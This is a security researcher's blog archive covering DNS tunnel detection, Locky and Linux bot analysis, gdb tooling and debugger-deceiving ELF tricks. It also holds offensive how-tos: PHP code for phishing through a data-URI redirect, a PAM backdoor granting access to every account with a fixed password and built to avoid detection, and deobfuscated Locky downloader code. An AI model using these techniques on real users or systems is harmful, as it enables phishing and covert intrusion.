lundi 12 décembre 2016

Yet another phishing in Firefox with data URI and 302 redirect

1/ Introduction

Little known fact: you can redirect HTTP to a data URI.

2/ Let's have fun with redirect

Create a php file:
 header("Location: data:text,Hello World");  
and serve it for Firefox. In all its glory, Firefox will print "Hello World!"

3/ Enhance with phishing

And yes, you can use HTML instead of pure text. And with HTML, you can do what you want. And the beginning of the data: URI will be printed in the adress bar. Looks good for having fun.
  • First, add HTML capabilities:
  • Second, trick user in address bar, because address bar will print the content of data: scheme: 
  • Third, add some HTML (and clean up)
    <HTML><html><script>document.body.innerHTML = '';</script><br>No, this is not from google accounts!!<br><br></html>
  • Fourth, be nice by adding a pretty thing in Tab bar of Firefox: Google

4/ Ready to go:

Create a php file like this:

 $data_uri = "data:text/html,";  
 $decoy = "";  
 $evil_html = "<html><script>document.body.innerHTML = '';</script><br>No, this is not from google accounts!!<br><br></html>";  
 $pretty_tab_print = "Google";  
 $redirect_url = $data_uri . $decoy . $evil_html . $pretty_tab_print;  
 header("Location: " . $redirect_url);  

And trick a user to go to this page (you know, phishing stuff, with or any url shortener):

A click on this php file served through a webserver will drive you to:

4/ Is it something new?

Well, yes and no.
Phishing with data URI is known for a veeery long time. A paper has been published some time ago
this is the same idea, I've added the vector with the 302 Redirect.

It's not a big deal, if you're tricked by this, you can be tricked by anything else.

lundi 5 décembre 2016

Finding DNS tunnels by analyzing network captures

DNS tunnels is a method used to exchange data on top of DNS traffic. It's generally used to bypass some filtering equipement to communicate between two hosts.

This article is about the detection of a DNS tunnel. Can we find DNS tunnels by analyzing a pcap offline? We will see that the first basic solution (counting subdomain for a domain) is prone to a high number of false positive when applied to real DNS data. We will then propose another approach wich could help for DNS Tunnel detection

1/ DNS tunnels: the theorical part

The theory here is super easy. If a client in a protected network can send DNS requests and receive response, then you can mount a DNS tunnel.

Clients sends encoded data for a specific subdomain of attacker domain and waits for the answer. This way, data is exchanged. The client just have to pay attention to make unique DNS requests, in order to avoid caching of an intermediary DNS server. Thanks to the multiple type of DNS requests, and to the size of requests, you can get some enough decent bandwidth to do an ssh session.

You can find a lot of resources for building DNS tunnels with a lot of tools: iodine, dnscapy, dnscat2, etc etc.. Those tools provide usually some encryption and helpers to exchange data.

2/ Finding should be super easy by counting requests

The most obvious way to spot a DNS tunnel should be counting the number of subdomain for a specific domain. For each chunk of data, client have to build a new DNS name for the domain owned by attacker.

I captured some DNS traffic while using a DNS tunnel (dnscat2 in that case). I estimate that we can type a lot of harmfull bash commands in dnscat2 in less than 50 DNS requests. Let's use 50 as a threshold: if a domain has more than 50 subdomain, then you can flag it as a DNS tunnel

3/ Ok, let's do it the dirty way: bash+python

There are a lot of way to analyze data, I choose a splitted approach:
  • at first, extract interesting data with tshark and bash to a flat file
  • tshark -2 -r "$1" -R "dns.flags.response == 1" -T fields -e > doms_qry
  • then analyze data with python
This way is convenient for me because I have easy access to the flat file after extraction and before analysis.

mitsurugi@dojo:~/DNS_analyzer/analyze_doms$ ./ ../dnscat2.pcap
Copied unique domains in doms_qry
Number of domains copied: 244 doms_qry
mitsurugi@dojo:~/DNS_analyzer/analyze_doms$ ./

Longest domains is constitued of 6 labels

Longest domain name is 235 char long:

######### Following domains ###########
Interesting tld for rank 0
 tux(243 subdomains)

######### Following domains ###########
Interesting tld for rank 1
 dnscat2.tux(243 subdomains)

You should investigate on domains
    dnscat2.tux  (243 subdomains)

That works remarkably well. If you find this kind of data in your DNS logs, you should investigate quickly.

4/ But, does this work in real life? (spoiler: no)

Well, this work in a test lab. Now, how does this work in real?
I have to say that it's incredibly hard to find real DNS data. See end of blog for details, but I had the chance to put hands on two full pcap capture from an university. I have to name and thanks ISCX : data is legit for research and analysis. Really a big thanks.

Now, I use the exact same programs and let's try if we can find DNS tunnels in those captures:

 mitsurugi@dojo:~/DNS_analyzer/analyze_doms$ ./

Longest domains is constitued of 8 labels fool! Don't make me laugh!
~Soulcalibur - Mitsurugi

Longest domain name is 59 char long:

######### Following domains ###########
Interesting tld for rank 0
 au(54 subdomains); net(1502 subdomains); gov(53 subdomains); jp(96 subdomains); org(195 subdomains); com(3181 subdomains); uk(91 subdomains)

######### Following domains ###########
Interesting tld for rank 1 subdomains); subdomains); subdomains); subdomains); subdomains); subdomains); subdomains); subdomains); subdomains); subdomains)

######### Following domains ###########
Interesting tld for rank 2 subdomains); subdomains)

You should investigate on domains  (146 subdomains)  (121 subdomains)  (105 subdomains)  (98 subdomains)  (87 subdomains)  (73 subdomains)  (68 subdomains)  (54 subdomains)  (52 subdomains)  (51 subdomains)

OK, so that's a full list of false positive. If I raise the threshold higher, then I can miss some short living DNS tunnel.

I think that we can clearly say that counting the number of subdomain doesn't work in practice.

5/ Can we do better? (spoiler: yes, sort of)

We have some options here:

5/1/ whitelisting domains

I don't like the idea of whitelisting. Usually, maintaining such lists are pita, but it can help you.

5/2/ analyzing only requests of type other than 'A' (and 'AAAA').

Well, you'll end up with a lot of MX and/or SPF records, that's still a good way to lower the noise, but it should help. I didn't see any DNS tunnels relying on A or AAAA type, but hackers have a lot of imagination.

5/3/ calculating entropy of domain.

Yeah, it should works. But you will face other problems: cdn names can look like random, MX name can look totally legit while being DNS data tunnels. More and more file reputations and cloud antivirus relies on TXT DNS requests... and they look totally likes DNS tunnels (a lot of different TXT requests going to the same domain). So, try at your own risks.

5/4/ Analyzing DNS response instead of requests.

It would be a lot better, combined with the previous one. Still, an hacker would be able to use AAAA or A records to exchange data (throughput of tunnel would be lowered by an order of magnitude, but hackers have a lot of time...)

5/5/ Raising threshold

It could work, but we have to agree on a number not to high, not to low. In the end, we must rely to human analysis, and it can't work that way.

6/ Lessons learned

They are some lessons here:

Counting subdomains doesn't work

No, counting subdomains doesn't work at all. It can helps do lower the size of data to analyze, but you can't trust it for sure.

It's hard to grab DNS data (really.) 

Sad but true. If you want to share DNS data with me (or know place where you can have some), I would be grateful. Beware, DNS data is an impressive way to gather metadata and has a lot of privacy concerns.

Parsing DNS data is not that easy. 

Everybody think they know DNS: "you ask a fqdn, you get an IP" and it's WRONG! You can end up with a lot of RR, multiple queries, UDP and TCP, endless CNAME requests, and so on. For this kind of research a flat file is enough, but I have to find better way to parse and analyze this kind of structured data.

...and beyond

You can find a LOT of things inside DNS data (more blog posts to come)

You fool! Don't make me laugh!
~Soulcalibur - Mitsurugi


mardi 20 septembre 2016

Break On Call and Break On Ret under gdb

1/ Adding BOC and BOR for gdb

As a reverse engineer, I like really gdb. It has a lot of cool features and is scriptable through python.

While I was solving a crackme challenge I needed a break on call and a break on ret instructions. I search the web and did not find what I wanted.

So, I developped a boc (break on call) and a bor (break on ret) function and sharing it today.

2/ How it works?

You just have to source a python file and you end up with three commands:
  • boc : activate break on call with boc on or boc off. You can choose by breaking or printing on call by boc break or boc print
  • bor : same commands for break on ret
  • go : if you have selected boc on and/or bor on, typing go will executing the binary until next call or next ret
 $ gdb -nx -q  
 (gdb) source   
 (gdb) boc  
 Status of Break on Call is off/break  
   Change with boc on/off and boc break/print  
 (gdb) bor  
 Status of Break on Ret is off/break  
   Change with bor on/off and bor break/print  
 (gdb) boc on  
 (gdb) boc  
 Status of Break on Call is on/break  
   Change with boc on/off and boc break/print  

3/ Please, just show me the code! 

It's on github
The Readme shows a typical bocbor session.

4/ Enjoy

Feedback, bugs: mail or twitter

mardi 30 août 2016

Don't always trust your debugger blindly : What You See Is not What You Get!

0/ Intro

A debugger or debugging tool is a computer program that is used to test and debug other programs (the "target" program) (source wikipedia). We can cite IDA or gdb as well known debuggers used in security community.

A debugger is also the security analyst best friend :-) it will help him (or her) to understand what the program is doing. But what if somebody craft an executable file which will show different behaviors between the debugger and the real life?

Let's do that under linux with an ELF binary. ELF is an executable format, supported by IDA and gdb. The format of ELF files is well-known. ELF contains headers, Program Headers and Section Headers.

Program headers are read by kernel when the ELF binary is launched, Section headers are read by debuggers. Theorically, they are the same. Theorically, they said.

Let's start with a very simple Hello World program:
 #include <stdlib.h>  
 const char hello[]="Hello World\n\x00\x03\x00\x00\x00\x01\x00\x02";  
 const char hell[]="Bad, bad World\n";  
 int main(void) {  

Don't pay attention for the garbage at the end of hello[] and the presence of hell[] for now. No need to be an expert to understand what will be printed.

1/ Taking a look Section headers

Let's look at .rodata section, containing the strings, and the relevant asm part in .text:

 mitsurugi@dojo:~/chall/magick$ readelf -x .rodata hello  
 Hex dump of section '.rodata':  
  0x080484e8 03000000 01000200 48656c6c 6f20576f ........Hello Wo  
  0x080484f8 726c640a 00030000 00010002 00426164 rld..........Bad  
  0x08048508 2c206261 6420576f 726c640a 00       , bad World..  
 mitsurugi@dojo:~/chall/magick$ readelf -S hello  
 There are 30 section headers, starting at offset 0xf20:  
 Section Headers:  
  [Nr] Name       Type      Addr   Off  Size  ES Flg Lk Inf Al  
  [ 0]          NULL      00000000 000000 000000 00   0  0 0  0 4  
  [15] .rodata      PROGBITS    080484e8 0004e8 00002e 00  A 0  0 4  

And the asm:
 0804842b <main>:  
  804842b:     8d 4c 24 04          lea  0x4(%esp),%ecx  
  804842f:     83 e4 f0             and  $0xfffffff0,%esp  
  8048432:     ff 71 fc             pushl -0x4(%ecx)  
  8048435:     55                   push  %ebp  
  8048436:     89 e5                mov  %esp,%ebp  
  8048438:     51                   push  %ecx  
  8048439:     83 ec 04             sub  $0x4,%esp  
  804843c:     83 ec 0c             sub  $0xc,%esp  
  804843f:     68 f0 84 04 08       push  $0x80484f0  
  8048444:     e8 a7 fe ff ff       call  80482f0 <puts@plt>  
  8048449:     83 c4 10             add  $0x10,%esp  
  804844c:     83 ec 0c             sub  $0xc,%esp  
  804844f:     6a 00                push  $0x0  
  8048451:     e8 ba fe ff ff       call  8048310 <exit@plt>  

puts will print the string located in 0x080484f0, located in .rodata section, which is "Hello World\n\x00<unprinted garbage>"

The Section headers says that you put 0x2e bytes from the offset 0x4e8 at the adress 0x080484e8

Let's change this slightly. Only in section headers, let says that the .rodata sections copy 0x18 bytes from the offset 0x4fd at 0x080484e8.

2/ Who are you, and what are you doing to my Section headers?

We now have a second file, called hello-patched. This file still runs good:
 mitsurugi@dojo:~/chall/magick$ ./hello-patched   
 Hello World  

The relevant part of Section headers are now:
 mitsurugi@dojo:~/chall/magick$ readelf -S hello-patched   
 There are 30 section headers, starting at offset 0xf20:  
 Section Headers:  
  [Nr] Name       Type      Addr   Off  Size  ES Flg Lk Inf Al  
  [15] .rodata      PROGBITS    080484e8 0004fd 000018 00  A 0  0 4  

2/1/ IDA gets tricked

Here is the printscreen of IDA disassembling this file:

Well, this can be confusing when you know that ./hello writes "Hello World"

So, what you see with IDA is not what you get (I've tested the Free edition of IDA v5.0 and IDA Pro 6.7)

2/2/ gdb is even more confusing

Ths string is not the same between x/s and puts call :)

 mitsurugi@dojo:~/chall/magick$ gdb -nx -q hello-patched  
 Reading symbols from hello...(no debugging symbols found)...done.  
 (gdb) disass main  
 Dump of assembler code for function main:  
   0x0804842b <+0>:     lea  0x4(%esp),%ecx  
   0x0804842f <+4>:     and  $0xfffffff0,%esp  
   0x08048432 <+7>:     pushl -0x4(%ecx)  
   0x08048435 <+10>:     push  %ebp  
   0x08048436 <+11>:     mov  %esp,%ebp  
   0x08048438 <+13>:     push  %ecx  
   0x08048439 <+14>:     sub  $0x4,%esp  
   0x0804843c <+17>:     sub  $0xc,%esp  
   0x0804843f <+20>:     push  $0x80484f0  
   0x08048444 <+25>:     call  0x80482f0 <puts@plt>  
   0x08048449 <+30>:     add  $0x10,%esp  
   0x0804844c <+33>:     sub  $0xc,%esp  
   0x0804844f <+36>:     push  $0x0  
   0x08048451 <+38>:     call  0x8048310 <exit@plt>  
 End of assembler dump.  
 (gdb) x/s 0x80484f0  
 0x80484f0 <hello>:     "Bad, bad World\n"  
 (gdb) run  
 Starting program: /home/mitsurugi/chall/magick/hello-patched   
 Hello World  
 [Inferior 1 (process 5382) exited normally]  

Ok, that's not really really true: As soon as you run the program, the Section is corrected, and x/s works as expected, but the demo is worth it. Said differently: if you don't run the binary under gdb, you'll get all wrong.

3/ Conclusion

Now think at a crackme, or malware using this technique. Static Analysts will get lost, without even noticing it :-)

Well, nothing new here: if the same information can be picked from two different places, you can be sure there will be problems.
The fact that Section headers can be changed is known since a very long time, I've just wanted to play a bit with it and manipulate ELF format. The idea of this blogpost has born in my mind after filling a bug I've had with radare2.
You can read another blogpost here with some mitigations in bonus.

If you want to try it with your debugger, you can download a copy of the patched hello file here: (sha256 = f63edf2de7d4edeb02650e3821921ddf3831ee33226cece8f81f31b912e464a5 ) and if it works/fail send me the info, I could compile some results :-)

There are few people who will make mistakes with fire after having once been burned.
~Yamamoto Tsunetomo

vendredi 29 juillet 2016

Update about #Locky xoring data scheme

1/ Intro

This post is a follow-up of this one:

The malware in question is Locky.

2/ Another Locky

Somebody sends me other Locky's zip files and I quickly figured that the core functionalities are the same
  • a .wsf in a zip file (wsf format slightly changed, so my prog in github does not work anymore)
  • some layer of obfuscation
  • all variables are named different, but the structure and functions are the same
  • The downloaded file is XOR-ed with values coming from a PRNG function
  • the PRNG seed has changed

This blogpost will talk about the PRNG.


Wikipedia to the rescue:
A pseudorandom number generator (PRNG) is an algorithm for generating a sequence of numbers whose properties approximate the properties of sequences of random numbers. The PRNG-generated sequence is not truly random, because it is completely determined by a relatively small set of initial values, called the PRNG's seed. (...) pseudorandom number generators are important in practice for their speed in number generation and their reproducibility.

And that's it. I think this is a really interesting move because the file downloaded over HTTP looks like random data. Here is the entropy for the file (made with binwalk):

You can compare with the file, once XOR-ed :

This is an interesting way to avoid analysis.
All the network probes only see random data. No particuliar header, no pattern to match.
No static key either (XORed file with static key doesn't see their entropy changing a lot and key can be retrieved).
You can eventually block file downloaded over HTTP when they have no known header and are around 200kB but it's not really precise.

4/ Get the seed

In my previous blogspot, I just copy paste the prng function, with the seed.
If you want to quickly get the seed, you can grep for mash(<data>) in the .wsf file, once extracted from the zip and unobfuscate.

Everything then is the same: generates more than 200k of pseudo random numbers, then XOR the file:
 mitsurugi@dojo:~/chall/infected$ js24 uhe_prng.js > prng_js   
 mitsurugi@dojo:~/chall/infected$ ./ cj937f7l  
 mitsurugi@dojo:~/chall/infected$ file cj937f7l cj937f7l-xored   
 cj937f7l:    data  
 cj937f7l-xored: PE32 executable (GUI) Intel 80386, for MS Windows  

5/ Conclusions and questions

I think that everything is not said in the case of Locky. When I read interesting analysis like the one in malwarelabs, I don't understand why they don't ran into the XOR part. No mention about the XOR: they found URL in the wsf file, then they got an .exe file (wut?).
Is there many campaigns, some with exe file other with XOR-ed one? As the URLs mentioned in malwarelabs post are not available anymore, I can't tell :-/

And if you got another samples to share, I'm still willing to take a look :-)

Courage first; power second; technique third.

lundi 18 juillet 2016

Analyzing zip with .wsf file inside

0/ Intro

Between the 13 and 16 of july, I've received of lot of spams, all based
on the same, now classical, pattern. A mail body with wording like:
"How is it going?
Please find attached document you asked for and the latest payments report
Hope that helps. Drop me a line if there is anything else you want to know"


"Please find the reference letter I attached."

and a zip file attached containing one file ending in .wsf

 mitsurugi@dojo:~/chall/infected/zipped_wsf$ unzip -l   
  Length   Date  Time  Name  
 --------- ---------- -----  ----  
   29295 2016-07-15 11:09  spreadsheet_87a4..wsf  
 ---------           -------  
   29295           1 file  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ unzip -l   
  Length   Date  Time  Name  
 --------- ---------- -----  ----  
   28380 2016-07-15 11:17  spreadsheet_7ff..wsf  
 ---------           -------  
   28380           1 file  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ unzip -l   
  Length   Date  Time  Name  
 --------- ---------- -----  ----  
   71060 2016-07-14 11:19  spreadsheet_17f5..wsf  
 ---------           -------  
   71060           1 file  

1/ stage 1 - unzip and get the script

All of the .wsf I saw looks more or less the same:

We have a job declaration, then a very long var (I snipped it for brievety, the line is more than 28000 chars long). This var is just a concatenation of all strings, and in the end, it's reversed.

In order to analyze it, you can copy/paste this var in a python file, and just reverse it:
 #! /usr/bin/python  
 aFusa0arM = ';}\n\r;)('+']fJU (... snipped +28000 chars for brievety ...)
 Fo'+'Tev" = '+'jXO rav'+'\n\r;"" +'+' "eli" '+'= tI ra'+'v\n\r;"" '+'+ "esol'+'c" = 0q'+'O rav';
 print aFusa0arM[::-1]  

2/ stage 2 - unobfuscate the javascript

The javascript file is 700 lines long. A quick glance at it reveals the obfuscation.

2/1/ Obfuscation : use of variables

The code relies heavily of variables.There is a lot of affectation:

 var VYd = "ct" + "";  
 var ZMv = "je" + "";  
 var UJd = "teOb" + "";  
 var AYe0 = "ea" + "";  
 var Co7 = "Cr" + "";  

Then, later on:
 var IUh=WScript[Co7 + AYe0 + UJd + ZMv + VYd]  

2/2/ Obfuscation : use of useless functions - 1

We see also a lot of useless function which produce in output the input given:

 function Xr1(WDv){return WDv;};  
 function Wu6(Jw3){return Jw3;};  

And then, it's use:
 IUh[OEc2 + ZBb4](Yr2[Yc8 + USr + Wu6(En) + Gt2]);  

Still, it's just basic obfuscation

2/3/ Obfuscation : use of useless functions - 2

There is another use of useless function. They are called only once, and produce a fixed output. We can find them from time to time:

 var SWh3=[Ww + NBp4 + (function BEs0(){return Xk6;}()) + IHx1 + QMa + CAi2, JRu9(QVt0) + Ir4 + MIs + XKm + Vo];  

The SWh3 var can be simplified like:

 var SWh3=[Ww + NBp4 + Xk6 + IHx1 + QMa + CAi2, QVt0 + Ir4 + MIs + XKm + Vo];  

2/4/ Unobfuscate

That's not really hard. Load all vars, then replace them in expression, remove all useless functions, and calculate the strings.

3/ part 2 - unobfuscation

Once the vars renamed, we can see the big picture of the file:

3/1/ vars declaration

The file begins with almost 700 lines of var declaration.

But only one line is really interesting:
 var VVq=[Jj+Qo5 + ZKy+(function PGr3(){return STa5;}())+ASs2 +   
 (function ICe1(){return XOl;}())+Aq5+MDs6 + Ty9+GZq + Pe+Pa1 +   
 Mp4+Xr1(Rq8)+(function WXz(){return Xw5;}()),   
 (function Ni8(){return Jj;}())+Eb+Lp0+Zv+Gu+RSq + JXa+Jv+Ne+  
 Wp + Yg+Ov + Kz1+RZl8+BBv + COk+IYz, Qe+Kg7+Em+Uc +   
 (function Ci(){return KKd1;}())+(function PJm6(){return Iq0;}())+  
 FWe(MAp7)+Uq3+Xv1 + Mf + DOo6+Nm(TEz5)+Ex5];  

Which can be read as:
var VVq=[element1, element2, element3]

this declares a table of three elements. After search and replace vars, we can read:

3/2/ a PRNG

 function uheprng()  
 function rawprng()  
 function Mash()  
If you google this, you can find that's a random number generator. It will be used later.

3/3/ The juicy part (vars unobfuscated)

 var IUh=WScript[CreateObject](ADODB.Stream);  
 IUh[SaveToFile](DJt9, Kn5);  
 var GHq4=Nh(DJt9); // Ok  
 GHq4=Zy(GHq4);   // This function is important  
 if (GHq4[length] < 100 * 1024 || GHq4[length] > 230 * 1024 || !ZZr(GHq4))  
   STn /* H */(Vh9, GHq4);  // it renames the file with .exe  
 catch (e) {break;};  
 Sn[Run](Vh9 + " 321");   //It runs the exe file with 321 as argument  

3/4/ the Zy function

the Zy() function is interesting:
 function Zy(WPx8)  
   var NKh;  
   var Je = uheprng();  
   for (var KFh4=0; KFh4 < WPx8[length]; KFh4++)  
     WPx8[KFh4] ^= Je(256);  
 (other stuff...)  

We can see that it XOR all bytes with the prng initialized to the value 256.

3/5/ The NH() and STn /* H  */() functions

Those functions looks more or less the same. It opens a file, then do byte translations if charCode > 128.
Maybe I'm missing something, but we don't need that to unobfuscate the exe file.

4/ Decrypt exe file

We have the download URLs, a wget is enough to get the file.
The hard part is to generate all the pseudo random numbers. I choose the easy way: Copy paste the PRNG function in a js file, then generate enough pseudo random numbers to use them later:

 function uheprng() {return (function() {  
 var o = 48, c = 1, p = o, s = new Array(o);  
 var i,j;  
 var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";  
 var mash = Mash();  
 for (i = 5806 - 5806; i < o; i++) s[i] = mash(0.598538);  
 mash = null;  
 var random = function( range ) {  
 return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));  
 function rawprng() {   
 if (++p >= o) p = 0;  
 var t = (482628 * 3 + 320979) * s[p] + c * 2.3283064365386963e-10;  
 return s[p] = t - (c = t | 0);  
 }return random;}());};  
 function Mash() {   
 var n = 0xefc8249d;  
 var mash = function(data) {  
 if ( data ) {  
 data = data.toString();  
 for (var i = 0; i < data.length; i++) {  
 n += data.charCodeAt(i);  
 var h = 0.02519603282416938 * n;  
 n = h >>> 0;  
 h -= n;  
 h *= n;  
 n = h >>> 0;  
 h -= n;  
 n += h * 0x100000000;  
 return (n >>> (1 * 0)) * 2.3283064365386963e-10;  
 } else n = 0xefc8249d;  
 return mash;  
 var Je = uheprng()  
 for (var i=0; i<200000; i++){  
 print(Je(256)); }  
and we can save all those numbers in a file:
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ js24 UHE_prng.js > prng_js  

Then a wget and an easy python script will get you the exe file:
 for i in p:  
 for i in range(len(data)):  
and we get:
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ ./ 8f72pw  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ file data  
 data: PE32 executable (GUI) Intel 80386, for MS Windows  

Now, we need somebody brave enough to launch it with 321 as an argument

5/ Automatize all the things

I wrote two python scripts. The first one extracts URLs from the zip file. The second one unxor the file. This is quick&dirty scripts and "It works for me" (tm)

 mitsurugi@dojo:~/chall/infected/zipped_wsf$ ./  
 Extracting zip  
 [+] Ok zip contains one file ending in .wsf  
 Get obfusctated js  
 [+] Assigning a long var, seems good  
 [+] We have to reverse the string  
 Parsing obfuscated and getting URLs  
 [+] printing download URLs  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ wget -q http://mana114[.]  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ ./ iqfywp  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ file data  
 data: PE32 executable (GUI) Intel 80386, for MS Windows  

  • The python file does an eval() for concatenating all vars. It's considered dangerous. Use at your own risk.
  • Some zip file are not exactly the same and my parser doesn't handle those. The logic behind is the same, but you will have to do analysis by hand. For what I saw, it's the same logic: unxor a file with a PRNG
  • Be aware that those scripts relies on a very small subset of zipfile and relies on a lot of assumptions. 
  • Be aware that I'm using the PRNG with 256 as a fixed value. If its change, the unxor won't work.
  • If you have some sample which doesn't work, I can take a look.

Here is the link to the github repo:


Our greatest glory is not in never falling, but in rising every time we fall!

You are not judged by the way you fall. 
You are judged by the way you get up after.

lundi 27 juin 2016

Sandboxing a linux malware with gdb

1/ Intro

As I was browsing the other day, I noticed some ELF malware. I choose to analyze one.
At first, it was just to learn some things, but in the end, I've finished by writing a full gdb script which was able to monitor safely all communication of this malware.

2/ Discovery

The file in question is a x86_64 ELF, statically linked, not stripped (!), weighting ~ 200kBytes:
mitsurugi@dojo:~/infected$ file Rx64 
Rx64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
mitsurugi@dojo:~/infected$ ls -l Rx64 
-rw-r--r-- 1 mitsurugi mitsurugi 204783 juin  20 17:54 Rx64

(spoiler off: in the end, I learn that this is DDOSbot/gayfgt family sample)

3/ Reverse

The reversing is not difficult, there is no obfuscation, no anti debug, no persistence. The binary only tries to be stealthy by forking at startup in order to hide its name, and it connects to a C&C, awaiting for commands.

The protocol used is really simple, it's a textual command/response one:
  • regularly, the server sends 'PING', the client replies 'PONG' and vice-versa
  • the server can close the communication
  • the server sets a secret at first use. Any call to the bot without that secret won't be followed by any action. The syntax is "!<secret> <action>"
  • the server can call any shell command
  • the server can call some other functions (flood and scan, basically)
Reverse was done, and an idea appears: why use this malware to connect to its C&C while being monitored?

The logic of the bot can be seen as:

  doing some forks, but only one process remains
  connection to C&C
  A big loop here
    Some code to manage all the forks process if any
    Read data from network
      if PING, send PONG
      if DUP, then exit()
      if starting with !<secret> sh <args> => fork and call shell 
      if starting with !<secret> command args => call function (fork and flood or scan) 

There is nothing really dangerous here. If we just block the shell and flood/scan commands, we end up with a simple client awaiting orders. With this legitimate client, we could connect to the C&C and hear it speak to us. We have to navigate through all the forks, and avoid dangerous commands but with gdb you can put a breakpoint and set $rip elsewhere.

4/ Instrument it

While I was analysing the file, I begun to write a gdb script in order to skip the forks, to print the C&C server, skip all dangerous function. This script became the one I'm showing here.

In the end, every dangerous function is totally neutralized, and I was able to launch it under gdb (and tor) the malware. It connects to the C&C and receive all commands :-)

Here is a live transcript, nothing exciting is showing, just endless PING/PONG reply after a SCANNER OFF (interesting, is the C&C really up?)

root@kali:~# gdb -q Rx64 
Reading symbols from Rx64...(no debugging symbols found)...done.
gdb$ source breakpoints 

#  Starting instrumented binary

                             Nothing ventured, nothing gained.
              You can't do anything without risking something.

Breakpoint 1 at 0x406731
Breakpoint 2 at 0x4067d0
Breakpoint 3 at 0x406466
Breakpoint 4 at 0x40689b
Breakpoint 5 at 0x4069df
Breakpoint 6 at 0x406a4d
Breakpoint 7 at 0x406c4d
Breakpoint 8 at 0x406e0b
gdb$ r
Starting program: /root/Rx64 
Breakpoint 1, 0x0000000000406731 in main ()
main() function
Breakpoint 2, 0x00000000004067d0 in main ()
Skipping all the forks
and the setsid
Breakpoint 3, 0x0000000000406466 in initConnection ()
We got currentServer!
0x417120: ""
Breakpoint 4, 0x000000000040689b in main ()
Back to main
Jumping all code related to forks
Breakpoint 5, 0x00000000004069df in main ()
* C&C is talking to us:
*0x7fffffffd090: "!* SCANNER OFF\n"
C&C sends a command
Will safely ignore it
Breakpoint 4, 0x000000000040689b in main ()
Back to main
Jumping all code related to forks
Breakpoint 5, 0x00000000004069df in main ()
* C&C is talking to us:
*0x7fffffffd090: "PING\n"
buf: PONG
Breakpoint 4, 0x000000000040689b in main ()
Back to main
Jumping all code related to forks
Breakpoint 5, 0x00000000004069df in main ()
* C&C is talking to us:
*0x7fffffffd090: "PING\n"
buf: PONG
Program received signal SIGINT, Interrupt.

5/ Conclusion

The malware is a well known linux malware, called DDOSbot or gayfgt, there is even some source sample available on internet.

Binary and gdb script are available on github:

Talk is easy, action is difficult.
Action is easy, true understanding is difficult

jeudi 16 juin 2016

Creating a backdoor in PAM in 5 line of code

Under Linux (and other Oses), authentification of users is made through Pluggable Authentication Module, aka PAM. Having centralized authentication is a good thing. But it has a drawback: if you trojanize it, you get key for everything. Trojan once, pwn evrywhere!

1/ Intro

Pam has three concepts: username, password and service. Its role is authenticate people to a service with a password.

Pam configuration is done under /etc/pam.d/ directory where each service has its own file:
 root@dojo:/etc/pam.d# ls  
 atd             common-password        lightdm-greeter       polkit-1      sudo  
 chfn            common-session         login       ppp       systemd-user  
 chpasswd        common-session-noninteractive      runuser   vmtoolsd  
 chsh            cron                   newusers    runuser-l xscreensaver  
 common-account  lightdm                other       sshd  
 common-auth     lightdm-autologin      passwd      su  

Basically, each one of those file calls a shared library, where the authentication or other kind things related to auth is done:
 root@dojo:/etc/pam.d# head login  
 # The PAM configuration file for the Shadow `login' service  
 # Enforce a minimal delay in case of failure (in microseconds).  
 # (Replaces the `FAIL_DELAY' setting from login.defs)  
 # Note that other modules may require another minimal delay. (for example,  
 # to disable any delay, you should add the nodelay option to pam_unix)  
 auth    optional delay=3000000  

And that'st he same kind of config files for all services. As I said, we want to backdoor PAM. We don't want to backdoor everything, we just want to be able to succeed in authentication with a choosen password, independantly of the real password of the user.

Almost all services include the common-auth file, and you can guess what is done here by its name.

2/ Backdooring in common-auth

The common-auth file has many directives, but the only important line here is the one checking the password of a user:
auth       [success=1 default=ignore] nullok_secure  

The common-auth file calls the shared library and authentication of user is done here. The logic of this file is easy to understand:
  • get username
  • get password
  • calls a subfunction to validate password against username
So, why don't add an if statement?
  • get username
  • get password
  • if password == "0xMitsurugi" then grant access, else calls the legitimate subfunction
Let go to the sources of PAM (depends on your distro, take the same version number as yours..) and look around line numbers 170/180 in the pam_unix_auth.c file:

mitsurugi@dojo:~/chall/PAM/pam_deb/pam-1.1.8$ vi modules/pam_unix/pam_unix_auth.c

Let's change this by:

Recompile the pam_unix_auth.c, end replace the file:
 mitsurugi@dojo:~/chall/PAM/pam_deb/pam-1.1.8$ make  
 mitsurugi@dojo:~/chall/PAM/pam_deb/pam-1.1.8$ sudo cp \  
  /home/mitsurugi/PAM/pam_deb/pam-1.1.8/modules/pam_unix/.libs/ \  

3/ Profit !

Try with login, with ssh, with sudo, with su, with the screensaver, your access will be granted with "0xMitsurugi" password. Open access for all accounts \o/

The best part of this is that everything else works as usual. Put your real password, it works. Put a bad one, it fails. Users can change their password, you can audit the strength of the shadow file, you can check for hidden files, you can check for config file modified, open ports, "weird logs", you'll get nothing, but attacker can still get in. Another great advantage of this is that it can remain undetected for a long time.

You can also add logging features in order to catch all password entered, that's an exercise left to the reader.

4/ Enjoy responsibly

Real friends don't backdoor theirs friend's machines.

No one can take Soul Edge from me!

mercredi 15 juin 2016

Analysis of an Evil Javascript

Some days ago, I was invited to check the security of a website.
A customer was complaining of getting alert from its AV while browsing a website, but a visual inspection of the webpage did not reveal anything.

1/ Watch closely

Come back when you're ready! (Denaoshite koi!)

When dealing with infected website, you can start with a simple wget (or curl) and analyze the result. For this time, wget would retrieve an inoffensive HTML file, so the first analysis shows nothing. But if you specify an Internet Explorer User-Agent, you get a different file, way more interesting.
That's a simple and effective trick made by attackers to stay undetected, because infected javascripts are not sent to everybody, only for innocents victims with vulnerable browsers, and not for security analysts. This is usually done with an .htaccess file.

The file I got with a MSIE User-agent looks like this:

 $ wget -U "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US))"  
 $ cat page.html  
 <span id="screenXConfirm" style="display:none">0 23 2cs2 czc22 1m3a i12 5b5 1-f2 2b2 3 11 -12
(...4000 chars later on this only line...)
